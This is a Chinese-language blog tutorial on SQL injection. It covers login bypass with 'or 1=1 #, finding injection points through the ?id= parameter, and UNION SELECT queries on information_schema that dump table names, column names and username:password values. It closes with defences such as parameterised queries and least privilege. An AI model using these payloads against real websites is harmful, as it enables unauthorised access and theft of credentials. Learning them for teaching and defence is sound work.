SQL注入

最新推荐文章于 2024-04-23 13:55:49 发布
最新推荐文章于 2024-04-23 13:55:49 发布
阅读量1k 收藏 4
点赞数 13
分类专栏: SQL注入 文章标签: sql 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_44515800/article/details/117409504
版权

什么是SQL注入
SQL注入是指通过构建特殊的输入篡改原来的SQL语句达到攻击者所需的操作。

Sql 注入产生原因
我们访问动态网页时往往会向服务器发送请求,服务器向数据访问层发起 Sql 查询请求,若验证通过就会执行 Sql 语句。如果用户输入的数据被构造成恶意Sql代码,如果程序没有细致地过滤用户输入的数据则会使非法数据侵入系统。

登录案例讲解
select * from admin where uname='用户名' and pwd='密码'
输入 'or 1=1 #(–空格或–+或#:注释掉后面的sql语句)
这时SQL语句变为:select * from admin where uname='' or 1=1 # and pwd='密码',这时SQL语句永远成立,绕过登录。

基于GET方式的SQL注入
通过在URL中修改对应的ID值,为正常数字、大数字、字符(单引号、双引号、双单引号、括号)、反斜杠来探测URL中是否有注入点。
可登陆到mituan.zone进行测试
1、’ '1'' LIMIT 0,1 ’ :多了一个单引号
可猜测SQL语句为:select login_name,password from admin where id = 'id' limit 0,1

2、’ ' LIMIT 0,1 ':多了一个单引号
可猜测SQL语句为:select login_name,password from admin where id = id limit 0,1

3、’ '1'') LIMIT 0,1 ':多了一个单引号
可猜测SQL语句为:select login_name,password from admin where id = ('id') limit 0,1

4、单引号、括号都不报错说明被接收的是字符串类型’ "1"") LIMIT 0,1 ':多了一个双引号
可猜测SQL语句为:select login_name,password from admin where id = ("id") limit 0,1

SQL注入利用

1、利用order by判断字段数

order by n(n为猜测字段数)--+

以案例一为例

select login_name,password from admin where id = 'id' limit 0,1
用?id=1' order by 11--+

猜测错误时则会报错
在这里插入图片描述
此时探测到有3个字段,用?id=0' union select 1,2,3--+探测到Login_name在第二列,Password在第三列,则第二、三列可利用。
在这里插入图片描述
?id=0' union select 1,2,3--+2,3改为user():查看当前MYSQL登录用户名,database():查看当前使用MYSQL数据库名,version():查看当前MYSQL版本,如改为?id=0'union select 1,user(),database()--+ 得到下图中信息
在这里插入图片描述
2、利用union select 联合查询,获取表名。(在使用union select时要将前面的SQL语句报错)

union select 1,group_concat(table_name),3 from information_schema.tables where table_schema=database()--+

在这里插入图片描述

3、利用union select 联合查询,获取字段名。(以上面查询到的users表为例)

union select 1,group_concat(column_name),3 from information_schema.columns where table_name='users'--+

在这里插入图片描述

4、利用union select 联合查询,获取字段值。(以上面查询到的users表为例)

union select 1,group_concat(username,0x3a,password),3 from users--+ (0x3a为冒号,用来分隔不同字段的值)

在这里插入图片描述
如果是地址栏不能显示信息的POST形式则可以在对话框中输入注入语句
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
在这里插入图片描述
这里使用的方法和在地址栏中的输入一样,都是先报错前面的SQL语句再使用union select联合查询拿出表中数据

SQL 注入的防范方法

  1. 对用户的输入进行过滤。如:对用户的输入进行校验,可以通过正则表达式、限制长度、对单引号和双"-"进行转换等。
  2. 编写程序时不要使用动态拼装sql,可以使用参数化的sql或者直接使用存储过程进行数据查询存取。
  3. 不要直接使用管理员权限的数据库连接,每个应用使用单独的且权限有限的数据库。
  4. 不要把机密信息直接存放,加密或者hash掉密码和敏感的信息。
  5. 程序的异常信息应该给出尽可能少的提示,最好使用自定义的错误信息对原始错误信息进行包装。
反派的大佬
关注
  • 13
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 11
    评论
专栏目录
sql注入攻击流量情况
07-18
sql注入攻击流量情况
Spring项目开发-用户模块登录功能开发
qq_27565603的博客
03-20 1293
用户登录功能主要包含了验证用户是否存在,用户密码是否正确,以及将当前用户信息记录在session里。 1.首先创建UserController,在controller里添加登录接口,传递参数username, password, session。添加@RequestMapping注解,设置属性value为请求的地址,method设置请求类型为POST;添加@RequestBody注解,将返回值自动将返回值序列化为json。 2.在service包下创建IUserService接口,声明login方法,传入u
clickhouse 关联查询_ClickHouse性能提升 SQL使用规范
weixin_34563472的博客
12-29 6476
本文经作者授权,独家转载:作者主页:https://www.jianshu.com/u/8f36a5e63d181. 不要用select *反例:select*fromapp.user_model正例:selectlogin_id,name,sexfromapp.user_model理由:只查询需要的字段可以减少磁盘io和网络io,提升查询性能2.不要在大结果集上构造...
Selector的使用(选择器)
login_csdn的专栏
03-25 635
//去除在ARC下使用performSelector:的警告         //[对象指针 减方法]         //[Dog alloc] --> alloc出来的这块空间是对象         //dog --> 对象指针,指向对象         Dog *dog = [[Dog alloc]init];         //在调用一个方法前,先判断类里面是否已经实现了这
SQL注入问题的研究与防护
m0_52341820的博客
04-14 7702
随着互联网的发展,Web应用程序得到了日益广泛的运用,与此同时黑客技术也得到了发展,Web应用程序的安全漏洞类型越来越多样化,所带来的安全隐患越多。SQL注入漏洞契机利用Web应用程序的安全漏洞进行SQL注入攻击达到绕过身份验证、窃取和破坏数据、伺机非法入侵等目的。本文围绕Web项目中的常见的SQL注入攻击的特点、原理并进行总结,提出在应用程序原有防御基础上使用输入验证、SQL Sever防御以及使用存储过程替代参数化查询相结合的形式构建出一种有效防范 SQL 注入攻击的思路和方法。测试结果......
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
超级sql注入工具
11-02
超级SQL注入工具(SSQLInjection)是一款基于HTTP协议自组包的SQL注入工具,支持出现在HTTP协议任意位置的SQL注入,支持各种类型的SQL注入,支持HTTPS模式注入。 超级SQL注入工具目前支持Bool型盲注、错误显示注入、...
sql注入网站源码
04-09
挺好的带有sql注入漏洞的asp网站源码,可以自行搭建环境。
SQL 注入天书.pdf
08-06
SQL 注入学习天书
SQL注入与防御研究(一)
zhalang8324的博客
01-13 634
本文持续更新。为SQL注入攻击与防御第二版读后感 第一章 SQL注入产生过程: 1.字符处理不当        '作为分界线。 2.类型处理不当        数字型,没加单引号,直接可继续执行命令。 LOAD_FILE, SELECT INTO OUTFILE 3.查询语句组装不当        $SQL = "SELECT". $_GET["column1"]. ",". $_...
sql注入实例分析
weixin_30624825的博客
07-23 3404
什么是SQL注入攻击?引用百度百科的解释: sql注入_百度百科: 所谓SQL注入,就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串,最终达到欺骗服务器执行恶意的SQL命令。具体来说,它是利用现有应用程序,将(恶意)的SQL命令注入到后台数据库引擎执行的能力,它可以通过在Web表单中输入(恶意)SQL语句得到一个存在安全漏洞的网站上的数据库,而不是按照设计者意图去执...
SQL注入攻击及其防范检测技术研究
郑长风
02-10 1416
 转载:http://safe.csdn.net/n/20081218/32.htmlSQL注入攻击及其防范检测技术研究 本文简要介绍了SQL注入攻击的原理,SQL注入攻击实现过程,并在此基础上给出了一种SQL注入攻击的自动防范模型。1  SQL注入攻击概述1.1  SQL注入技术定义SQL注入SQL Injection)技术在
SQL注入的实现原理和防范
Derry的专栏
03-24 770
SQL注入是从正常的WWW端口访问,而且表面看起来跟一般的Web页面访问没什么区别,所以目前市面的防火墙都不会对SQL注入发出警报,如果管理员没查看IIS日志的习惯,可能被入侵很长时间都不会发觉。SQL注入的手法相当灵活,在注入的时候需要根据具体情况进行分析,构造巧妙的SQL语句,从而成功获取想要的数据.   SQL注入攻击的总体思路是:   1. 发现SQL注入位置;   2. 判断后台数据库类
如何在Android应用中安全地使用SQLite数据库,并通过SQLCipher进行加密保护
轻描时光
04-23 79
Android内置SQLite轻量级关系型数据库,可以在Android应用中存储、检索和管理结构化数据。SQLite是一个无服务器的、零配置的、事务性的SQL数据库引擎,非常适合用于移动设备和桌面应用程序中。:SQLite不需要单独的服务器进程或操作系统级别的配置。可以直接读写磁盘上的文件,非常高效且适合在资源有限的移动设备上使用。:SQLite支持ACID事务,提供了原子性、一致性、隔离性和持久性。保证了即使在发生故障的情况下,数据的完整性也能得到维护。
如何写好SQL
jiangchao98的博客
04-23 1057
split函数返回的结果是一个数组类型,因此在进行一些操作时需要将其转换为其他适合的数据类型,例如字符串或结构体等。使用Hive中的LATERAL VIEW关键字来进行表的展开操作,并将展开的结果作为一列结果集中的元素。【解析 json 的字符串 json_string, 同时指定多个 json 数据中的 column,返回对应的 value。如果输入的 json 字符串无效,结果返回 NULL】在 Hive 中,array_join 函数用于将一个数组中的元素按照指定的分隔符连接成一个字符串。
SQL的基础语句
qq_51321722的博客
04-22 939
因此在写子查询语句时,可以先测试下内层的子查询语句是否输出了想要的内容,再一层层往外测试,增加子查询正确率。使用SELECT查询时,如果结果集数据量很大,比如几万行数据,放在一个页面显示的话数据量太大,不如分页显示,每次显示100条。上述查询LIMIT 3 OFFSET 0表示,对结果集从0号记录开始,最多取3条。包含左边表的全部行(不管右边的表中是否存在与他们匹配的行),以及右边表中全部匹配的行。包含右边表的全部行(不管右边的表中是否存在与他们匹配的行),以及左边表中全部匹配的行。
sql server 恢复数据库、单表数据的方法
SS33SSS的博客
04-23 197
弹出选择文件框,点【添加】--然后选刚刚的XX.bak文件--我这里就是放在D盘、一下子就找到了,确定,如下图。2、下面开始还原(恢复)数据库,对着【数据库】右键--【新建数据库】--然后随便命名,如下图。1、查看备份文件在哪个路径、一般文件夹名都是叫:Backup。7、点【选项】--【覆盖】那一项打上勾--确定,如下图。
在windows系统安裝 SQL Server 版本的最低需求
最新发布
qq_42711010的博客
04-23 196
針對對應您的作業系統所要安裝的 SQL Server 版本的最低需求
postman sql注入
01-04
Postman是一款常用的API开发和测试工具,它主要用于发送HTTP请求并查看响应。Postman本身并不直接涉及SQL注入问题,因为它只是一个工具,用于发送和接收HTTP请求和响应。然而,如果你在Postman中发送的请求中存在SQL注入漏洞,那么Postman将会显示响应中的错误信息。 要在Postman中进行SQL注入测试,你可以按照以下步骤操作: 1. 打开Postman并创建一个新的请求。 2. 在请求中选择合适的HTTP方法(如GET、POST等)和URL。 3. 在请求的参数中,尝试插入一些可能导致SQL注入的恶意输入,例如单引号、注释符号等。 4. 发送请求并查看响应。如果响应中包含SQL语法错误或其他与SQL注入相关的错误信息,那么说明存在SQL注入漏洞。 需要注意的是,Postman只是用于测试和验证API的工具,并不能直接修复或防止SQL注入漏洞。要修复和防止SQL注入漏洞,需要在应用程序的后端代码中采取相应的安全措施,例如使用参数化查询、输入验证和过滤等。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 11
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

反派的大佬

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值